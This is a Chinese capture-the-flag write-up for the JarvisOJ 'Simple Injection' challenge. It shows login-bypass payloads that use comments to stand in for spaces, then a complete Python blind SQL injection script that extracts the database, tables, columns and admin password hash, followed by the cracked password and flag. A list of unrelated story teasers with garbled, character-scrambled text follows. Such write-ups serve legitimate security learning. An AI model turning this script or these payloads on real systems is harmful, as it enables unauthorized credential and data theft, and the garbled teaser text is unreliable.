2019-10-02 JarvisOj Simple Injection

先試試萬(wàn)能密碼
'or 1=1#
提示用戶名錯(cuò)誤
'or/**/1=1#
提示密碼錯(cuò)誤
看來(lái)是過(guò)濾了空格并且可以用注釋代替空格來(lái)繞過(guò)
直接上腳本爆破

import requests,string

allPrintableChars=string.digits + string.ascii_lowercase + string.ascii_uppercase + string.punctuation#構(gòu)造字典

url='http://web.jarvisoj.com:32787/login.php'

def getDb():
    payload={
        'username':'',
        'password':1
    }
    result=''
    flag=1
    count=0
    while flag:
        flag=0
        count+=1
        for c in allPrintableChars:
            asc=ord(c)
            payload['username']="'or/**/ascii(substr(database(),%d,1))=%d#"%(count,asc)
            response=requests.post(url,data=payload)
            if "密碼錯(cuò)誤" in response.text:
                result+=c
                flag=1
                print("database:",result)
    return result

def getTb():
    payload={
        'username':'',
        'password':1
    }
    result=''
    flag=1
    count=0
    while flag:
        flag=0
        count+=1
        for c in allPrintableChars:
            asc=ord(c)
            payload['username']="'or/**/ascii(substr((select/**/group_concat(table_name)from/**/information_schema.tables/**/where/**/table_schema=database()),%d,1))=%d#"%(count,asc)
            response=requests.post(url,data=payload)
            if "密碼錯(cuò)誤" in response.text:
                result+=c
                flag=1
                print("table:",result)
    return result

def getCol():
    payload={
        'username':'',
        'password':1
    }
    result=''
    flag=1
    count=0
    while flag:
        flag=0
        count+=1
        for c in allPrintableChars:
            asc=ord(c)
            payload['username']="'or/**/ascii(substr((select/**/group_concat(column_name)from/**/information_schema.columns/**/where/**/table_schema=database()),%d,1))=%d#"%(count,asc)
            response=requests.post(url,data=payload)
            if "密碼錯(cuò)誤" in response.text:
                result+=c
                flag=1
                print("columns:",result)
    return result

def getPassword():
    payload={
        'username':'',
        'password':1
    }
    result=''
    flag=1
    count=0
    while flag:
        flag=0
        count+=1
        for c in allPrintableChars:
            asc=ord(c)
            payload['username']="'or/**/ascii(substr((select/**/password/**/from/**/admin),%d,1))=%d#"%(count,asc)
            response=requests.post(url,data=payload)
            if "密碼錯(cuò)誤" in response.text:
                result+=c
                flag=1
                print("password:",result)
    return result
    
if __name__ == '__main__':
    print("Database:%s\nTable:%s\nColums:%s\nPassword:%s\n"%(getDb(),getTb(),getCol(),getPassword()))

得到用戶名為admin密碼為334cfb59c9d74849801d5acdcfdaadc3
將密碼MD5解密后為eTAloCrEP
登錄寡键，得到flag:CTF{s1mpl3_1nJ3ction_very_easy!!}

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者

人面猴
序言：七十年代末预麸，一起剝皮案震驚了整個(gè)濱河市，隨后出現(xiàn)的幾起案子汇四，更是在濱河造成了極大的恐慌锯玛，老刑警劉巖咐柜，帶你破解...
沈念sama閱讀 218,941評(píng)論 6贊 508
死咒
序言：濱河連續(xù)發(fā)生了三起死亡事件兼蜈，死亡現(xiàn)場(chǎng)離奇詭異，居然都是意外死亡拙友，警方通過(guò)查閱死者的電腦和手機(jī)为狸，發(fā)現(xiàn)死者居然都...
沈念sama閱讀 93,397評(píng)論 3贊 395
救了他兩次的神仙讓他今天三更去死
文/潘曉璐我一進(jìn)店門，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)遗契，“玉大人辐棒，你說(shuō)我怎么就攤上這事‰狗洌” “怎么了漾根？”我有些...
開(kāi)封第一講書(shū)人閱讀 165,345評(píng)論 0贊 356
道士緝兇錄：失蹤的賣姜人
文/不壞的土叔我叫張陵，是天一觀的道長(zhǎng)鲫竞。經(jīng)常有香客問(wèn)我辐怕，道長(zhǎng)，這世上最難降的妖魔是什么从绘？我笑而不...
開(kāi)封第一講書(shū)人閱讀 58,851評(píng)論 1贊 295
?港島之戀（遺憾婚禮）
正文為了忘掉前任寄疏，我火速辦了婚禮，結(jié)果婚禮上僵井，老公的妹妹穿的比我還像新娘陕截。我一直安慰自己，他們只是感情好批什，可當(dāng)我...
茶點(diǎn)故事閱讀 67,868評(píng)論 6贊 392
惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的
文/花漫我一把揭開(kāi)白布农曲。她就那樣靜靜地躺著，像睡著了一般驻债。火紅的嫁衣襯著肌膚如雪乳规。梳的紋絲不亂的頭發(fā)上，一...
開(kāi)封第一講書(shū)人閱讀 51,688評(píng)論 1贊 305
城市分裂傳說(shuō)
那天却汉，我揣著相機(jī)與錄音驯妄，去河邊找鬼。笑死合砂，一個(gè)胖子當(dāng)著我的面吹牛青扔，可吹牛的內(nèi)容都是我干的。我是一名探鬼主播翩伪，決...
沈念sama閱讀 40,414評(píng)論 3贊 418
雙鴛鴦連環(huán)套：你想象不到人心有多黑
文/蒼蘭香墨我猛地睜開(kāi)眼微猖，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼！你這毒婦竟也來(lái)了缘屹？” 一聲冷哼從身側(cè)響起凛剥，我...
開(kāi)封第一講書(shū)人閱讀 39,319評(píng)論 0贊 276
萬(wàn)榮殺人案實(shí)錄
序言：老撾萬(wàn)榮一對(duì)情侶失蹤，失蹤者是張志新（化名）和其女友劉穎轻姿，沒(méi)想到半個(gè)月后犁珠，有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體逻炊，經(jīng)...
沈念sama閱讀 45,775評(píng)論 1贊 315
?護(hù)林員之死
正文獨(dú)居荒郊野嶺守林人離奇死亡，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛以下內(nèi)容為張勛視角年9月15日...
茶點(diǎn)故事閱讀 37,945評(píng)論 3贊 336
?白月光啟示錄
正文我和宋清朗相戀三年犁享，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了余素。大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
茶點(diǎn)故事閱讀 40,096評(píng)論 1贊 350
活死人
序言：一個(gè)原本活蹦亂跳的男人離奇死亡炊昆，死狀恐怖桨吊，靈堂內(nèi)的尸體忽然破棺而出，到底是詐尸還是另有隱情凤巨，我是刑警寧澤视乐，帶...
沈念sama閱讀 35,789評(píng)論 5贊 346
?日本核電站爆炸內(nèi)幕
正文年R本政府宣布，位于F島的核電站敢茁，受9級(jí)特大地震影響佑淀，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜彰檬，卻給世界環(huán)境...
茶點(diǎn)故事閱讀 41,437評(píng)論 3贊 331
男人毒藥：我在死后第九天來(lái)索命
文/蒙蒙一渣聚、第九天我趴在偏房一處隱蔽的房頂上張望。院中可真熱鬧僧叉，春花似錦、人聲如沸棺榔。這莊子的主人今日做“春日...
開(kāi)封第一講書(shū)人閱讀 31,993評(píng)論 0贊 22
一樁弒父案，背后竟有這般陰謀
文/蒼蘭香墨我抬頭看了看天上的太陽(yáng)症歇。三九已至郎笆，卻和暖如春，著一層夾襖步出監(jiān)牢的瞬間忘晤，已是汗流浹背宛蚓。一陣腳步聲響...
開(kāi)封第一講書(shū)人閱讀 33,107評(píng)論 1贊 271
情欲美人皮
我被黑心中介騙來(lái)泰國(guó)打工，沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留设塔，地道東北人凄吏。一個(gè)月前我還...
沈念sama閱讀 48,308評(píng)論 3贊 372
代替公主和親
正文我出身青樓，卻偏偏與公主長(zhǎng)得像闰蛔，于是被迫代替她去往敵國(guó)和親痕钢。傳聞我的和親對(duì)象是個(gè)殘疾皇子，可洞房花燭夜當(dāng)晚...
茶點(diǎn)故事閱讀 45,037評(píng)論 2贊 355

2019-10-02 JarvisOj Simple Injection

推薦閱讀更多精彩內(nèi)容